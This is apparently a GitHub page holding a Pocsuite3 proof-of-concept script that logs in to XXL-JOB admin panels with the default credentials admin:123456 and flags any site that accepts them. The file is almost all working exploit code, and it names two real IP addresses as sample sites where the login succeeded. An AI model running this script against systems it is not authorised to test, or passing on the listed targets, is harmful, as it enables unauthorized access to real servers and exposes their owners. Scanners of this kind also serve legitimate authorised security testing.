-
Notifications
You must be signed in to change notification settings - Fork 1
/
xxl-job_weakpassword.py
88 lines (78 loc) · 3.35 KB
/
xxl-job_weakpassword.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
from pocsuite3.api import (
Output,
POCBase,
POC_CATEGORY,
register_poc,
requests,
VUL_TYPE,
)
class XxlJobPoc(POCBase):
vulID = "99033" # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
version = "1" # 默认为1
author = "ZorIqz" # PoC作者的大名
vulDate = "2022-07-13" # 漏洞公开的时间,不知道就写今天
createDate = "2022-07-13" # 编写 PoC 的日期
updateDate = "2022-07-13" # PoC 更新的时间,默认和编写时间一样
references = ["https://github.com/xuxueli/xxl-job"] # 漏洞地址来源,0day不用写
name = "xxl-job 后台弱口令漏洞 PoC" # PoC 名称
appPowerLink = "https://github.com/xuxueli/xxl-job" # 漏洞厂商主页地址
appName = "xxl-job" # 漏洞应用名称
appVersion = "all" # 漏洞影响版本
vulType = VUL_TYPE.WEAK_PASSWORD # 漏洞类型,类型参考见 漏洞类型规范表
category = POC_CATEGORY.EXPLOITS.WEBAPP
samples = ["http://47.107.96.18:8082", "http://139.224.55.60:9000"] # 测试样列,就是用 PoC 测试成功的网站
# install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
desc = """
xxl-job后台存在弱口令漏洞,将会导致他人进入存在弱口令的后台读取敏感信息或进行敏感操作等。
""" # 漏洞简要描述
pocDesc = """
admin:123456
""" # POC用法描述
def _check(self):
# 漏洞验证代码
headers = {"User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1"}
payload = {"userName": "admin", "password": "123456"}
result = []
# 一个异常处理 , 生怕站点关闭了 , 请求不到 , 代码报错不能运行
try:
url = self.url.strip() + "/login" # self.url 就是你指定的-u 参数的值
res = requests.post(url=url, headers=headers, data=payload, verify=False, timeout=9)
data_dict = res.json()
# 判断是否存在漏洞
if data_dict.get("code") == 200 and data_dict.get("msg") == None:
result.append(url)
except Exception as e:
print(e)
# 跟 try ... except是一对的 , 最终一定会执行里面的代码 , 不管你是否报错
finally:
return result
def _verify(self):
# 验证模式 , 调用检查代码 ,
result = {}
res = self._check() # res就是返回的结果列表
if res:
result['VerifyInfo'] = {}
result['VerifyInfo']['Info'] = self.name
result['VerifyInfo']['vul_url'] = self.url
result['VerifyInfo']['vul_detail'] = self.desc
return self.parse_verify(result)
def _attack(self):
# 攻击模式 , 就是在调用验证模式
return self._verify()
def parse_verify(self, result):
# 解析认证 , 输出
output = Output(self)
# 根据result的bool值判断是否有漏洞
if result:
output.success(result)
else:
output.fail('Target is not vulnerable')
return output
# 其他自定义的可添加的功能函数
def other_fuc():
pass
# 其他工具函数
def other_utils_func():
pass
# 注册 DemoPOC 类
register_poc(XxlJobPoc)